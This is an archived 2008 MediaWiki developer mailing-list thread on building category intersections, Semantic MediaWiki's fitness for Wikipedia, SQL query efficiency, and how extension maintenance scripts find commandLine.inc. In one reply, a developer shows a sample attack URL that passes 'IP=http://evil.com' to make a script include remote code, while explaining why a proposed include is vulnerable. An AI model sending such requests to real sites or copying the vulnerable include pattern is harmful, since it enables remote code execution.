At the risk of asking a stupid question: what is the status of category intersections? I guess this is really directed to Brion, Tim, and anyone capable of doing commits. Is there any interest/motivation in making it happen? I think a lucene index is the way to go - if someone coded an interface, could someone capable of doing it (Tim?) set up the index?
Best Regards, Aerik
On Tue, Apr 15, 2008 at 12:16 AM, Aerik Sylvan aerik@thesylvans.com wrote:
At the risk of asking a stupid question: what is the status of category intersections? I guess this is really directed to Brion, Tim, and anyone capable of doing commits. Is there any interest/motivation in making it happen? I think a lucene index is the way to go - if someone coded an interface, could someone capable of doing it (Tim?) set up the index?
I'm capable of doing commits, but not setting anything up on the site. For my part, adding category intersection functionality for core is probably the next significant thing I'd do, given some time to spend on development work (which may or may not be available soon). I would add it using MySQL fulltext in core (and PostgreSQL support also belongs in core, if someone wants to write that), but with a pluggable backend. But someone could easily preempt me, since I have no timetable for this.
On Tue, Apr 15, 2008 at 10:00:23AM -0400, Simetrical wrote:
I'm capable of doing commits, but not setting anything up on the site. For my part, adding category intersection functionality for core is probably the next significant thing I'd do, given some time to spend on development work (which may or may not be available soon). I would add it using MySQL fulltext in core (and PostgreSQL support also belongs in core, if someone wants to write that), but with a pluggable backend.
MySQL fulltext search is only available in MyISAM. MyISAM has very poor locking support. We can't use it for the WMF server farm.
Regards,
jens
On Tue, Apr 15, 2008 at 10:08 AM, Jens Frank jf@mormo.org wrote:
On Tue, Apr 15, 2008 at 10:00:23AM -0400, Simetrical wrote:
I'm capable of doing commits, but not setting anything up on the site. For my part, adding category intersection functionality for core is probably the next significant thing I'd do, given some time to spend on development work (which may or may not be available soon). I would add it using MySQL fulltext in core (and PostgreSQL support also belongs in core, if someone wants to write that), but with a pluggable backend.
MySQL fulltext search is only available in MyISAM. MyISAM has very poor locking support. We can't use it for the WMF server farm.
Yup, thus the pluggable backend. (Although Brion suggested that maybe MyISAM could be tried on Wikimedia for this.) Something like Lucene isn't suitable for support in core.
Aerik Sylvan wrote:
At the risk of asking a stupid question: what is the status of category intersections?
At the risk of making a stupid answer: you could install the Semantic MediaWiki extension and make queries like
{{#ask: [[Category:Actor]] [[Category:Director]] }}
SMW will query for membership of subcategories (thus it'll match members of Child actors) , to a configurable depth limit. The nifty thing is you can display other properties and categories of matching pages.
See demo (temporarily) at, http://www.semanticweb.org/wiki/Sandbox#Category_intersections
Cheers, -- =S Page
On Wed, Apr 16, 2008 at 1:02 AM, S Page info@skierpage.com wrote:
At the risk of making a stupid answer: you could install the Semantic MediaWiki extension
Probably most of us know of SMW. The goal here appears to be to get something enabled on Wikipedia, which rules out SMW without an extremely large amount of review and (presumably) revision.
Hoi, One bit of revision that has been scheduled before Wikimania 2008 is changing the localisation of Semantic MediaWiki in order to have it supported in Betawiki. Compared to the version we saw demonstrated at Wikimania 2007 SMW has become a lot easier to use. The performance and scalability has improved a lot so a lot of revision has been done. This does not mean that more review would not be welcome, it does mean that it is not that obvious that Semantic MediaWiki should be ruled out. Thanks, GerardM
On Wed, Apr 16, 2008 at 3:23 PM, Simetrical <Simetrical+wikilist@gmail.comSimetrical%2Bwikilist@gmail.com> wrote:
On Wed, Apr 16, 2008 at 1:02 AM, S Page info@skierpage.com wrote:
At the risk of making a stupid answer: you could install the Semantic MediaWiki extension
Probably most of us know of SMW. The goal here appears to be to get something enabled on Wikipedia, which rules out SMW without an extremely large amount of review and (presumably) revision.
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
Hi all,
here are my two (point five) cents as SMW developer:
(1) Yes, SMW needs to be tuned for being used in Wikipedia. It has many settings to enable or disable features, and some features are clearly too much for one of the worlds-largest sites. The default settings, for obvious reasons, are not tuned for Wikipedia ;-)
(2) SMW consists of many independent components. Especially, its common syntax [[property::value]] is a *tiny* (30 lines of PHP ;-) part of the system, and can readily be replaced by anything you like (including templates). So the "standardised templates" vs. "typed links" is really just a minor issue!
But whenever I see people discussing SMW, I see talks about syntax and query performance. Syntax can be changed easily and queries can even be turned off, and still SMW is useful! Here are some things that SMW provides beyond parsing square brackets:
** Datatype parsing, partly internationalised. E.g. the system recognises that "+1234" is the same number as "1.234,0", support for Gregorian-Julian calendar conversion is coming, and geographical coordinates can already be written in many ways. This is computationally cheap, but you will want that for template-based structuring as well.
** Storage. SMW has an object oriented storage API so that the storage (DB tables or whatever) can be changed without changing the rest of the code. It provides internal object-models and data structures that are useful for dealing with structured data. Why reinvent all that or handle data values as plain strings internally?
** Export. SMW has various interfaces to directly export data to other systems. In addition to the long-standing RDF/XML export, we now also have iCal support, and direct connections to "semantic" datastores that can also be hosted on different servers. This means that all data entered in the wiki is directly written into a separate database which has its own standard query interfaces (the SPARQL query language typically being the method of choice). No need to use SMW's internal query engine if this is too stressful for servers.
** Extensions. Things like SemanticForms (form input) or SemanticLayers (embedded maps beyond Google) already use SMW APIs internally and still need not be computationally problematic.
(2.5) All apologies to the BetaWiki guys -- we really want to join as soon as possible (and it should be possible!).
Cheers,
Markus
On Mittwoch, 16. April 2008, Gerard Meijssen wrote:
Hoi, One bit of revision that has been scheduled before Wikimania 2008 is changing the localisation of Semantic MediaWiki in order to have it supported in Betawiki. Compared to the version we saw demonstrated at Wikimania 2007 SMW has become a lot easier to use. The performance and scalability has improved a lot so a lot of revision has been done. This does not mean that more review would not be welcome, it does mean that it is not that obvious that Semantic MediaWiki should be ruled out. Thanks, GerardM
On Wed, Apr 16, 2008 at 3:23 PM, Simetrical <Simetrical+wikilist@gmail.comSimetrical%2Bwikilist@gmail.com>
wrote:
On Wed, Apr 16, 2008 at 1:02 AM, S Page info@skierpage.com wrote:
At the risk of making a stupid answer: you could install the Semantic MediaWiki extension
Probably most of us know of SMW. The goal here appears to be to get something enabled on Wikipedia, which rules out SMW without an extremely large amount of review and (presumably) revision.
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
On Fri, Apr 18, 2008 at 3:05 AM, Markus Krötzsch mak@aifb.uni-karlsruhe.de wrote:
But whenever I see people discussing SMW, I see talks about syntax and query performance. Syntax can be changed easily and queries can even be turned off, and still SMW is useful! Here are some things that SMW provides beyond parsing square brackets: [etc.]
The point is that it *does* provide so many things. This makes reviewing it pretty difficult, so it doesn't look likely to get enabled any time soon, according to my interpretation of statements I've seen from Brion. Thus we look to alternatives for use on Wikipedia, which are small and narrow and can be easily reviewed. If SMW were split into many small modules (possibly all with a dependency on a small central core) it might stand a better chance of ever being considered for use on Wikimedia projects.
Besides, stuff like tag searches should probably be in the core software, not an extension. They're a semi-expected feature in fancy Web 2.0 software these days.
On Freitag, 18. April 2008, Simetrical wrote:
On Fri, Apr 18, 2008 at 3:05 AM, Markus Krötzsch
mak@aifb.uni-karlsruhe.de wrote:
But whenever I see people discussing SMW, I see talks about syntax and query performance. Syntax can be changed easily and queries can even be turned off, and still SMW is useful! Here are some things that SMW provides beyond parsing square brackets: [etc.]
The point is that it *does* provide so many things. This makes reviewing it pretty difficult, so it doesn't look likely to get enabled any time soon, according to my interpretation of statements I've seen from Brion. Thus we look to alternatives for use on Wikipedia, which are small and narrow and can be easily reviewed. If SMW were split into many small modules (possibly all with a dependency on a small central core) it might stand a better chance of ever being considered for use on Wikimedia projects.
Great! Just let us know what you need. We can extract and bundle any feature into a sub-piece of software, and you can decide how small you want it to be to allow proper review (I am a very picky contribution reviewer myself, so I feel with Brion here :). But SMW is fairly modular anyway, and I can quickly separate most functions. The core certainly is the storage API that SMW and many extensions refer to (the DB schema can be changed, just the store's object API is somewhat central).
I can provide you with a more detailed overview of the components to let you decide what you need. In any case that should be easier than rewriting things from scratch, and it would ensure compatibility with the non-included SMW functions (which is in our interest even if you want only a small part). So, if Wikimedia is interested in features that we might possibly provide, then there appears to be no reason not to challenge us before starting new projects :-)
You might also contact Wikia, who already did tests before enabling SMW on their machines. Maybe they have concrete complaints that we should address.
Besides, stuff like tag searches should probably be in the core software, not an extension. They're a semi-expected feature in fancy Web 2.0 software these days.
I am happy with moving code to core ;-) But, seriously, even if you go for completely new implementations, it would be great if we could discuss these things to make all those additions at least minimally compatible. Is there currently a core group of people at MW who are interested in that topic? Who would be likely to develop such an in-core tagging feature anyway?
We may sometimes have trouble finding enough development time in our work life, but we know how to put our priorities. And we have means to hire people and to buy servers if motivated by Wikipedia requirements. So far, we have not seen concrete requests/complaints from the Wikipedia side and have mainly developed what our current users requested (well, not all of it ;-). Ask and you will be answered.
Best regards,
Markus
On Fri, Apr 18, 2008 at 11:45 AM, Markus Krötzsch mak@aifb.uni-karlsruhe.de wrote:
Great! Just let us know what you need.
Well, I'm not the right person to ask. :) Brion or Tim has to review anything you want to go live. I don't have shell access and can't enable extensions. If you want a particular feature of SMW enabled on Wikimedia, the right course of action is to 1) break off the code for that specific feature into some kind of small, narrow, easily-reviewable bundle, 2) open a bug asking for that single specific feature to be enabled, 3) pester people until they review it, 4) fix any complaints they have, 5) goto (3). Then repeat for any other individual features.
At least that's my impression of what would work -- again, I'm not any authority here. One thing that's for sure is that active pestering is usually needed to get things done at present.
I am happy with moving code to core ;-) But, seriously, even if you go for completely new implementations, it would be great if we could discuss these things to make all those additions at least minimally compatible. Is there currently a core group of people at MW who are interested in that topic? Who would be likely to develop such an in-core tagging feature anyway?
Well, there have been fairly extensive discussions on this list about implementation of category intersections. Software discussions are done here.
On Freitag, 18. April 2008, Simetrical wrote:
On Fri, Apr 18, 2008 at 11:45 AM, Markus Krötzsch
mak@aifb.uni-karlsruhe.de wrote:
Great! Just let us know what you need.
Well, I'm not the right person to ask. :)
I know, but I assume the according people (also the ones who have requirements for tagging/cat intersection) are also on this list ;-)
Brion or Tim has to review anything you want to go live. I don't have shell access and can't enable extensions. If you want a particular feature of SMW enabled on Wikimedia, the right course of action is to 1) break off the code for that specific feature into some kind of small, narrow, easily-reviewable bundle, 2) open a bug asking for that single specific feature to be enabled, 3) pester people until they review it, 4) fix any complaints they have, 5) goto (3). Then repeat for any other individual features.
At least that's my impression of what would work -- again, I'm not any authority here. One thing that's for sure is that active pestering is usually needed to get things done at present.
OK, thanks. We will then try to propose what parts of SMW could safely be used on Very Large Sites already. The main insight for me here is that we should not just extend SMW with more features, but also create lightweight versions with less features! We will see what we can do.
I am happy with moving code to core ;-) But, seriously, even if you go for completely new implementations, it would be great if we could discuss these things to make all those additions at least minimally compatible. Is there currently a core group of people at MW who are interested in that topic? Who would be likely to develop such an in-core tagging feature anyway?
Well, there have been fairly extensive discussions on this list about implementation of category intersections. Software discussions are done here.
Yes, I see (but, alas, cannot follow all discussions going on here ...). I will try to review the discussions on this list soon to gather requirements. Anyway, if anyone working on tagging/cat intersections right now reads that, I would appraciate direct feedback.
Best regards,
Markus
On Sat, 19 Apr 2008 10:20:07 +0200, Markus Krötzsch wrote:
On Freitag, 18. April 2008, Simetrical wrote:
On Fri, Apr 18, 2008 at 11:45 AM, Markus Krötzsch
mak@aifb.uni-karlsruhe.de wrote:
Great! Just let us know what you need.
Well, I'm not the right person to ask. :)
I know, but I assume the according people (also the ones who have requirements for tagging/cat intersection) are also on this list ;-)
Brion or Tim has to review anything you want to go live. I don't have shell access and can't enable extensions. If you want a particular feature of SMW enabled on Wikimedia, the right course of action is to 1) break off the code for that specific feature into some kind of small, narrow, easily-reviewable bundle, 2) open a bug asking for that single specific feature to be enabled, 3) pester people until they review it, 4) fix any complaints they have, 5) goto (3). Then repeat for any other individual features.
At least that's my impression of what would work -- again, I'm not any authority here. One thing that's for sure is that active pestering is usually needed to get things done at present.
OK, thanks. We will then try to propose what parts of SMW could safely be used on Very Large Sites already. The main insight for me here is that we should not just extend SMW with more features, but also create lightweight versions with less features! We will see what we can do.
I'd guess that category intersections would be the place to start. That's been talked about quite a bit here, and seems like the most basic feature of SMW. Attributes are like an enhanced category/tag, which add more functionality, and more weird quirks.
The kind of thing that would improve the category intersection, such as a real category ID in core, would also help other areas of SMW; like assigning a type to an attribute ID rather than the attribute and every use of it.
-Steve
On Mon, Apr 21, 2008 at 1:12 PM, Steve Sanbeg ssanbeg@ask.com wrote:
The kind of thing that would improve the category intersection, such as a real category ID in core,
We've had that for weeks now.
On Mon, 21 Apr 2008 21:42:43 -0400, Simetrical wrote:
On Mon, Apr 21, 2008 at 1:12 PM, Steve Sanbeg ssanbeg@ask.com wrote:
The kind of thing that would improve the category intersection, such as a real category ID in core,
We've had that for weeks now.
Oh, funny I missed that; although w.r.t SMW, I've been looking more closely at the latest released version of MW & SMW.
So maybe it would make sense to develop an extension that would use the category ID with an SMW like front end, using code broken off from both extensions?
On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:
Steve Sanbeg schreef:
So maybe it would make sense to develop an extension that would use the category ID with an SMW like front end, using code broken off from both extensions?
Wouldn't it be better just to improve SMW's category handling?
Roan Kattouw (Catrope)
That should be the end result. But it seems it's been decided that SMW is too monolithic, and Markus has already offered to split parts into smaller extensions, so this seems like the logical place to start.
-Steve
Hoi, It would be cool if there were more clarity about this. Semantic MediaWiki has been around for a long time. All the major criticisms of the past have been dealt with. It cannot be said that the code is unknown or unknowable. It has only one new command, it performs much better compared to last year, it is being localised at Betawiki. I was told that even Wikia supports it on request for its wikis...
Being able to break the SMW code into parts is indicative of code that is build in a modular way. SMW would make a bigger difference in my mind then the introduction of catalogs. It would be a massive boost to our aim to make information available to the world.
Truly, if Semantic MediaWiki is not to be considered be at least clear why. The alternative is unpleasant speculations and technical solutions that are considered not necessarily the best.
Thanks, GerardM
On Wed, Apr 23, 2008 at 5:29 PM, Steve Sanbeg ssanbeg@ask.com wrote:
On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:
Steve Sanbeg schreef:
So maybe it would make sense to develop an extension that would use the category ID with an SMW like front end, using code broken off from both extensions?
Wouldn't it be better just to improve SMW's category handling?
Roan Kattouw (Catrope)
That should be the end result. But it seems it's been decided that SMW is too monolithic, and Markus has already offered to split parts into smaller extensions, so this seems like the logical place to start.
-Steve
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
Well, I can only offer my 2 cents, from my fairly limited experience with it.
It seems that what's mostly needed now is a front end for category intersection. The one new function you talk about, and its associated special pages, are the only implementation of that that I'm aware of.
However, the back end probably has issues, since support for that in core has only recently been enhanced, and there is still ongoing work, which would benefit SMW.
Attributes seem to add more complexity and have some more issues that would need to be worked on. I think that should be a lower priority than splitting the code. I.e. a core Semantic Mediawiki that just uses the existing database schema & namespaces, and another extension to add arbitrary tagging/relations.
On Wed, 23 Apr 2008 18:01:54 +0200, Gerard Meijssen wrote:
Hoi, It would be cool if there were more clarity about this. Semantic MediaWiki has been around for a long time. All the major criticisms of the past have been dealt with. It cannot be said that the code is unknown or unknowable. It has only one new command, it performs much better compared to last year, it is being localised at Betawiki. I was told that even Wikia supports it on request for its wikis...
Being able to break the SMW code into parts is indicative of code that is build in a modular way. SMW would make a bigger difference in my mind then the introduction of catalogs. It would be a massive boost to our aim to make information available to the world.
Truly, if Semantic MediaWiki is not to be considered be at least clear why. The alternative is unpleasant speculations and technical solutions that are considered not necessarily the best.
Thanks, GerardM
On Wed, Apr 23, 2008 at 5:29 PM, Steve Sanbeg ssanbeg@ask.com wrote:
On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:
Steve Sanbeg schreef:
So maybe it would make sense to develop an extension that would use the category ID with an SMW like front end, using code broken off from both extensions?
Wouldn't it be better just to improve SMW's category handling?
Roan Kattouw (Catrope)
That should be the end result. But it seems it's been decided that SMW is too monolithic, and Markus has already offered to split parts into smaller extensions, so this seems like the logical place to start.
-Steve
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
2008/4/24 Steve Sanbeg ssanbeg@ask.com:
It seems that what's mostly needed now is a front end for category intersection. The one new function you talk about, and its associated special pages, are the only implementation of that that I'm aware of.
Um, yes. What do we want as an interface?
1. A search interface:"Enter tags:"
2. For [[Category:Left-handed living Jewish American lesbian poets of Martian citizenship]] to automatically populate from the intersection of tags "Left-handed people", "Living people", "Jewish people", "American people", "Lesbians", "Poets" and "Martian citizens".
The second is harder but lets us preserve the querulously tiny subcategories for backward compatibility. OTOH, luring people prone to idiot wiki flamewars into an idiot wiki flamewar keeps them too busy to mess up anything important. So let's not regard 2. as being a blocker in any way whatsoever.
- d.
Simetrical schreef:
Well, there have been fairly extensive discussions on this list about implementation of category intersections. Software discussions are done here.
MinuteElectron wrote a pretty good implementation of category intersection as an extension [1]. The only downsides I see are: * It uses the LinkUpdater to gradually build the categoryintersections table, but there's no maintenance script to build the entire table at once. I've written one today, but haven't figured out yet how to properly integrate this into an extension (I can't really get the path to the maintenance dir from there; are there any other extensions with CLI scripts around?) * It uses nested queries to intersect three or more categories, and it's hard for me to judge how efficient they are. More about this later. * It doesn't have a clean API to get a category intersection sub-query (this could be written of course, and it should if we're gonna use it)
As to the subquery thing, I'll describe how the extension fetches pages that are in categories A, B and C (all three of them). First, it calculates hashes for A|B, A|C and B|C (will be called hashAB, hashBC and hashAC respectively). Then, it queries the categoryintersections table for pages that have all three hashes, as follows:
SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashAB' AND ci_page IN ( SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashBC' AND ci_page IN ( SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashAC' ) )
I ran an EXPLAIN on it, but I can't really judge if it's bad or good, 'cause I don't know how bad those dependent subqueries are:
id select_type table type possible_keys 1 PRIMARY categoryintersections ref PRIMARY 2 DEPENDENT SUBQUERY categoryintersections eq_ref PRIMARY 3 DEPENDENT SUBQUERY categoryintersections eq_ref PRIMARY
id key key_len ref rows Extra 1 PRIMARY 4 const 2 Using where; Using index 2 PRIMARY 8 const,func 1 Using where; Using index 3 PRIMARY 8 const,func 1 Using where; Using index
For clarification, the structure of the categoryintersections table is as follows: | CREATE TABLE `categoryintersections` ( `ci_page` int(10) unsigned NOT NULL, `ci_hash` int(10) unsigned NOT NULL, PRIMARY KEY (`ci_hash`,`ci_page`) ); | Can someone who knows more about database efficiency than I do comment on this? Also, I'd like to suggest we merge this extension into core (after improving it first), thoughts?
Roan Kattouw (Catrope)
On Tue, Apr 22, 2008 at 9:39 AM, Roan Kattouw roan.kattouw@home.nl wrote:
MinuteElectron wrote a pretty good implementation of category intersection as an extension [1].
You left out the reference here, but if you're talking about this,
http://svn.wikimedia.org/viewvc/mediawiki/trunk/extensions/CategoryIntersect...
then it was written by Magnus. I've already commented on it somewhat.
The only downsides I see are:
- It uses the LinkUpdater to gradually build the categoryintersections
table, but there's no maintenance script to build the entire table at once. I've written one today, but haven't figured out yet how to properly integrate this into an extension (I can't really get the path to the maintenance dir from there; are there any other extensions with CLI scripts around?)
Mostly we just assume that we're in wikiroot/extensions/.
As to the subquery thing, I'll describe how the extension fetches pages that are in categories A, B and C (all three of them). First, it calculates hashes for A|B, A|C and B|C (will be called hashAB, hashBC and hashAC respectively). Then, it queries the categoryintersections table for pages that have all three hashes, as follows:
SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashAB' AND ci_page IN ( SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashBC' AND ci_page IN ( SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashAC' ) )
As I've commented before: this query won't work on MySQL 4, so it can't be in core (unless perhaps disabled by default, or intelligently auto-enabled depending on SQL engine). It will also probably run very poorly on higher versions of MySQL, since MySQL is stupid about rewriting subqueries into joins. This should be written as a join:
SELECT ci_page FROM categoryintersection AS ci1 JOIN categoryintersection AS ci2 ON ci1.ci_page = ci2.ci_page WHERE ci1.ci_hash = 'hashAB' AND ci2.ci_hash = 'hashBC'
Note that you don't need the third table at all; if something is in A intersect B and in B intersect C, it's automatically in A intersect C as well.
In this case it's an extremely fast query, but that's because there are only one or two rows returned for each result. In the worst case of an empty match, or a match with fewer results than the LIMIT, it will have to scan through both intersections in their entirety, which may well be thousands of rows. It's also much less powerful than a Boolean full-text search: it can't handle subtractions and will probably have to be crippled to some small number of intersections.
Also, I'd like to suggest we merge this extension into core (after improving it first), thoughts?
Well, if someone writes an interface for category intersections, it might be reasonable to have multiple backends in core, given that the backend will be flexible anyway. One advantage of Magnus' scheme is that it will work in pretty much any SQL engine with no modification (at least if rewritten to eliminate advanced features like subqueries ;) ). The alternative suggestion of a fulltext engine will work only on MySQL 5, and possibly PostgreSQL (at least with appropriate extra coding).
Simetrical schreef:
The only downsides I see are:
- It uses the LinkUpdater to gradually build the categoryintersections
table, but there's no maintenance script to build the entire table at once. I've written one today, but haven't figured out yet how to properly integrate this into an extension (I can't really get the path to the maintenance dir from there; are there any other extensions with CLI scripts around?)
Mostly we just assume that we're in wikiroot/extensions/.
I'll do that then, but it's still somewhat creepy.
As to the subquery thing, I'll describe how the extension fetches pages that are in categories A, B and C (all three of them). First, it calculates hashes for A|B, A|C and B|C (will be called hashAB, hashBC and hashAC respectively). Then, it queries the categoryintersections table for pages that have all three hashes, as follows:
SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashAB' AND ci_page IN ( SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashBC' AND ci_page IN ( SELECT ci_page FROM categoryintersections WHERE ci_hash = 'hashAC' ) )
As I've commented before: this query won't work on MySQL 4, so it can't be in core (unless perhaps disabled by default, or intelligently auto-enabled depending on SQL engine). It will also probably run very poorly on higher versions of MySQL, since MySQL is stupid about rewriting subqueries into joins. This should be written as a join:
SELECT ci_page FROM categoryintersection AS ci1 JOIN categoryintersection AS ci2 ON ci1.ci_page = ci2.ci_page WHERE ci1.ci_hash = 'hashAB' AND ci2.ci_hash = 'hashBC'
Didn't think of that.
Note that you don't need the third table at all; if something is in A intersect B and in B intersect C, it's automatically in A intersect C as well.
We probably need to hash generation functions then: one that generates all hashes corresponding to a certain page (AB, AC and BC), and one which generates hashes for a query (AB and BC only in this case).
In this case it's an extremely fast query, but that's because there are only one or two rows returned for each result. In the worst case of an empty match, or a match with fewer results than the LIMIT, it will have to scan through both intersections in their entirety, which may well be thousands of rows. It's also much less powerful than a Boolean full-text search: it can't handle subtractions and will probably have to be crippled to some small number of intersections.
Also, I'd like to suggest we merge this extension into core (after improving it first), thoughts?
Well, if someone writes an interface for category intersections, it might be reasonable to have multiple backends in core, given that the backend will be flexible anyway. One advantage of Magnus' scheme is that it will work in pretty much any SQL engine with no modification (at least if rewritten to eliminate advanced features like subqueries ;) ). The alternative suggestion of a fulltext engine will work only on MySQL 5, and possibly PostgreSQL (at least with appropriate extra coding).
I missed the explanation of the fulltext implementation. Something like 'Foo With_spaces Bar' and then do a fulltext search for the cats you need? That would be more powerful, and would probably be faster for complex intersections. I'll write an alternative to CategoryIntersections that uses the fulltext schema and run some benchmarks. I expect to have some results by the end of the week.
Roan Kattouw (Catrope)
On Tue, Apr 22, 2008 at 10:59 AM, Roan Kattouw roan.kattouw@home.nl wrote:
I missed the explanation of the fulltext implementation. Something like 'Foo With_spaces Bar' and then do a fulltext search for the cats you need? That would be more powerful, and would probably be faster for complex intersections. I'll write an alternative to CategoryIntersections that uses the fulltext schema and run some benchmarks. I expect to have some results by the end of the week.
Aerik Sylvan has already done an implementation of the backend using CLucene. If a front-end could be done in core, with a pluggable backend, that might have the best chance of getting enabled on Wikimedia relatively quickly. MyISAM fulltext is not necessarily going to be fast enough due to the locking.
"Roan Kattouw" roan.kattouw@home.nl wrote in message news:480DFD4D.8000806@home.nl...
Simetrical schreef:
The only downsides I see are:
- It uses the LinkUpdater to gradually build the categoryintersections
table, but there's no maintenance script to build the entire table at once. I've written one today, but haven't figured out yet how to properly integrate this into an extension (I can't really get the path to the maintenance dir from there; are there any other extensions with CLI scripts around?)
Mostly we just assume that we're in wikiroot/extensions/.
I'll do that then, but it's still somewhat creepy.
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely. It would be good if MW provided a framework for running per-extension maintenance scripts.
For example, to run the 'upgrade' script for the CategoryIntersection extension, you could use:
~/wiki/maintenance/ $ php updateExtension.php CategoryIntersection upgrade
- Mark Clements (HappyDog)
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements gmane@kennel17.co.uk wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
Simetrical schreef:
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements gmane@kennel17.co.uk wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
The point is I gotta require_once() /maintenance/commandLine.inc or whatever it's called. Of course, creating a symlink to commandLine.inc (or copying it around if you're on Windows) will solve that.
Roan Kattouw (Catrope)
"Roan Kattouw" roan.kattouw@home.nl wrote in message news:480F1B00.5090804@home.nl...
Simetrical schreef:
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements
gmane@kennel17.co.uk wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside
the MW
source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
The point is I gotta require_once() /maintenance/commandLine.inc or whatever it's called. Of course, creating a symlink to commandLine.inc (or copying it around if you're on Windows) will solve that.
From an extension writer's point of view, the current situation is to put in
a relative require_once() line to commandLine.inc and hope that the file is in the expected place. You are then dependent on the user having set things up 'correctly' on their server, and either let PHP throw whatever messages it throws if it isn't, or add a load of checks to the system. The symlink solution is not something that the writer can rely on. It is also not terribly convenient if your extensions are in ~/mw_extensions to have to create a ~/maintenance symlink, and probably a ~/AdminSettings.php symlink as well - that's a lot of clutter in your home directory!
What would be better would be if extension writers could simply stick the following code at the top of their maintenance scripts:
if (!defined("MEDIAWIKI") || !$wgCommandLine) die("Maintenence scripts should be run from your wiki's maintenance folder, using updateExtension.php");
updateExtension.php would do all the necessary checks and inclusions that extensions will need (DB connection, LocalSettings, setting up paths, etc.) so you, as an extension writer, don't have to worry about this side of things at all.
- Mark Clements (HappyDog)
On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements gmane@kennel17.co.uk wrote:
From an extension writer's point of view, the current situation is to put in a relative require_once() line to commandLine.inc and hope that the file is in the expected place.
global $IP; require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Andrew Garrett wrote:
On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements gmane@kennel17.co.uk wrote:
From an extension writer's point of view, the current situation is to put in a relative require_once() line to commandLine.inc and hope that the file is in the expected place.
global $IP; require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Besides not working, that would be an arbitrary remote code execution vulnerability:
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://e...
A better way to do it is:
require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
If that path doesn't exist, the sysadmin can create it. Scripts that rely on the working directory being $IP or whatever are really annoying.
-- Tim Starling
"Tim Starling" tstarling@wikimedia.org wrote in message news:fung8v$bon$1@ger.gmane.org...
Andrew Garrett wrote:
On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements
gmane@kennel17.co.uk wrote:
From an extension writer's point of view, the current situation is to
put in
a relative require_once() line to commandLine.inc and hope that the
file is
in the expected place.
global $IP; require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Besides not working, that would be an arbitrary remote code execution vulnerability:
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://e vil.com
$IP is not defined at the point that the script is run. $IP is defined by including commandLine.inc, so you're getting into a bit of a circular scenario there... :-)
A better way to do it is:
require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
If that path doesn't exist, the sysadmin can create it. Scripts that rely on the working directory being $IP or whatever are really annoying.
That is the current method, which causes problems as detailed in my previous post. To expand on your point, scripts that rely on the extension being in the extensions folder are also annoying.
We provide MediaWiki to our clients via a symlink in their web folder. They have an 'extensions' folder in their home directory where they can add their own extensions (the MW extensions folder is also used for the MW extensions we have enabled globally and which we offer support for). Currently there is no easy way for them to run the maintenance scripts for the extensions they have locally installed without hacking the code to fix the paths.
- Mark Clements (HappyDog)
"Simetrical" Simetrical+wikilist@gmail.com wrote in message news:7c2a12e20804221716xaa6f5cflf216ff28c6324015@mail.gmail.com...
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
I imagine an 'updateExtension' script in the 'maintenance' folder that include()s the appropriate command line/site settings/etc. files then looks for a script with the appropriate name (based on the extension name which is supplied as first arg on command line - 'ExtName' in this example) in the following places.
*/extensions/ExtName/maintenance.php */ExtName/maintenance.php
Where * means anywhere in the include path. If the file exists, run it with the remaining arguments passed through, for which there should be a standardised subset that most extensions use (e.g. 'install' and 'upgrade') though extension-specific items are allowed. If no arg (or an unexpected arg) is provided then the extension file is expected to print out the details about available items (i.e. equivalent to 'help').
- Mark Clements (HappyDog)
